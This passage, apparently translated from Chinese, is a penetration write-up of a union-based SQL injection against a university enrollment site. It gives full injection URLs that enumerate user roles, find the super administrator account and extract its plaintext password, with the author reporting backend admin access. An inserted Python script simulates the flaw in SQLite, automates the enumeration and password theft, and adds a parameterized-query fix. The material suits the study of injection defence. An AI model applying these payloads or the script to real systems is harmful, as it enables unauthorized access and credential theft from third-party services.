http://www.xxx.com/messageviewlisting.do?method=query&criteria=2%3D1+and+title+like+%27%252010%25%27 union all select
NULL,USERNAME,NULL,ROLENAME,ROLE_ID,NULL,NULL,NULL,NULL,NULL from
VW_GY_USER_REL_RULE where ROLE_ID<>'ff80808102e6b16e0102fd3761c200cf' and
ROLE_ID<>'402880711d2d9284011d2d987ee90001'
After several more attempts, I submitted:
http://www.xxx.com/messageviewlisting.do?method=query&criteria=2%3D1+and+title+like+%27%252010%25%27 union all select
NULL,USERNAME,NULL,ROLENAME,ROLE_ID,NULL,NULL,NULL,NULL,NULL from
VW_GY_USER_REL_RULE where ROLE_ID<>'ff80808102e6b16e0102fd3761c200cf' and
ROLE_ID<>'402880711d2d9284011d2d987ee90001' and
ROLE_ID<>'402880d21997cadf011997cdd8cb0003' and
ROLE_ID<>'402880d2191321a60119135323d1001b' and
ROLE_ID<>'402880d2191321a60119134afc990012' and
ROLE_ID<>'402880befe8e9e8400fe8e9e84c30000' and
ROLE_ID<>'402880befe8e9e8400fe8ea9600f0004' and
ROLE_ID<>'402880d2191321a6011913549b8d001f' and
ROLE_ID<>'402880d2191321a60119134c01a50016'
I finally found the "graduate enrollment super administrator" (研究生学籍超级管理员); the username is yyadmin.
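The technique used above, and the password lookup that the article performs next, carried through as an added example rather than the article's own code: a Python script that simulates the vulnerable endpoint with an in-memory SQLite database, drives out every row of VW_GY_USER_REL_RULE one request at a time by excluding the ROLE_IDs already seen (the reason each URL above grows by one `ROLE_ID<>'…'` clause), then swaps ROLE_ID for USERPW and filters on USERNAME. The assumptions are labelled in the code: that messageviewlisting.do concatenates the `criteria` parameter into the WHERE clause of a ten-column SELECT and renders only the first row; the table contents, usernames, role IDs and passwords are constructed for the demo; and the `safe_query` function is the editor's suggested hardening, not something from the page.

```python
"""Added example, not code from the article: simulates the union-based row
enumeration against an in-memory SQLite database.

Assumptions (not stated on the page): the vulnerable endpoint builds
`SELECT <10 columns> FROM message WHERE <criteria>` by concatenating the
`criteria` parameter and renders only the first row, which is why each
request must exclude the ROLE_IDs already seen."""
import sqlite3

# Constructed sample data standing in for VW_GY_USER_REL_RULE. All names,
# role IDs and passwords are invented; they are not the article's data.
SAMPLE_USERS = [
    ("stu01", "student", "r001", "pw-stu01"),
    ("tea01", "teacher", "r002", "pw-tea01"),
    ("dept01", "department admin", "r003", "pw-dept01"),
    ("superadm", "enrollment super admin", "r004", "pw-superadm"),
]

COLUMNS = "id, title, body, author, created, c6, c7, c8, c9, c10"


def make_db():
    """Build the simulated application database (constructed contents)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE message ({COLUMNS})")
    conn.execute("INSERT INTO message VALUES "
                 "(1, 'notice 2010', 'x', 'a', '2010-01-01', 0, 0, 0, 0, 0)")
    conn.execute("CREATE TABLE VW_GY_USER_REL_RULE (USERNAME, ROLENAME, ROLE_ID, USERPW)")
    conn.executemany("INSERT INTO VW_GY_USER_REL_RULE VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_query(conn, criteria):
    """The flaw: `criteria` is a raw SQL fragment from the client, and only
    the first matching row is rendered (assumed behaviour of the endpoint)."""
    sql = f"SELECT {COLUMNS} FROM message WHERE " + criteria
    return conn.execute(sql).fetchone()


def union_payload(projection, where=""):
    """Same shape as the article's payload: kill the original rows with 2=1,
    then append a 10-column UNION; columns 2, 4 and 5 are the visible ones."""
    return ("2=1 and title like '%2010%' union all select "
            + projection + " from VW_GY_USER_REL_RULE" + where)


def enumerate_roles(conn, max_rows=100):
    """Drive out every row one request at a time by excluding seen ROLE_IDs."""
    seen, rows = [], []
    while len(rows) < max_rows:
        where = (" where " + " and ".join(f"ROLE_ID<>'{rid}'" for rid in seen)) if seen else ""
        row = vulnerable_query(conn, union_payload(
            "NULL,USERNAME,NULL,ROLENAME,ROLE_ID,NULL,NULL,NULL,NULL,NULL", where))
        if row is None:  # nothing left once every ROLE_ID has been excluded
            break
        username, rolename, role_id = row[1], row[3], row[4]
        seen.append(role_id)
        rows.append((username, rolename, role_id))
    return rows


def fetch_password(conn, username):
    """Second stage from the article: project USERPW instead of ROLE_ID and
    filter by USERNAME. Returns None when no such user exists."""
    row = vulnerable_query(conn, union_payload(
        "NULL,USERNAME,NULL,ROLENAME,USERPW,NULL,NULL,NULL,NULL,NULL",
        f" where USERNAME='{username}'"))
    return None if row is None else row[4]


def safe_query(conn, title_keyword):
    """Editor's hardened form (not from the page): the client supplies a
    keyword, never a SQL fragment, and the keyword is bound as a parameter."""
    sql = f"SELECT {COLUMNS} FROM message WHERE title LIKE ?"
    return conn.execute(sql, ("%" + title_keyword + "%",)).fetchone()


if __name__ == "__main__":
    db = make_db()
    for entry in enumerate_roles(db):
        print(entry)
    print(fetch_password(db, "superadm"))
    # The same union text passed to the safe version is just a LIKE pattern.
    print(safe_query(db, "' union all select NULL,USERNAME,NULL,ROLENAME,USERPW,"
                         "NULL,NULL,NULL,NULL,NULL from VW_GY_USER_REL_RULE --"))
```

The loop terminates naturally: once every ROLE_ID is in the exclusion list the UNION contributes no rows, the first SELECT is already dead because of `2=1`, and the endpoint returns nothing. With `safe_query` the attacker-controlled text only ever reaches the database as a bound `LIKE` pattern, so the union is never parsed as SQL.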
Now to query his password. I submitted:
http://www.xxx.com/messageviewlisting.do?method=query&criteria=2%3D1+and+title+like+%27%252010%25%27 union all select
NULL,USERNAME,NULL,ROLENAME,USERPW,NULL,NULL,NULL,NULL,NULL from
VW_GY_USER_REL_RULE where USERNAME='yyadmin'
The administrator's password was stored in plaintext, so I obtained backend administrator privileges without trouble. Later, though, it turned out that the functions available to this administrator were very limited, and in the end I did not get a JSP shell. Still, it was a remarkably twisted injection experience.
-------------------------------------------------------------------------------
Prerequisite knowledge: none
Keywords: Public, asp.net, penetration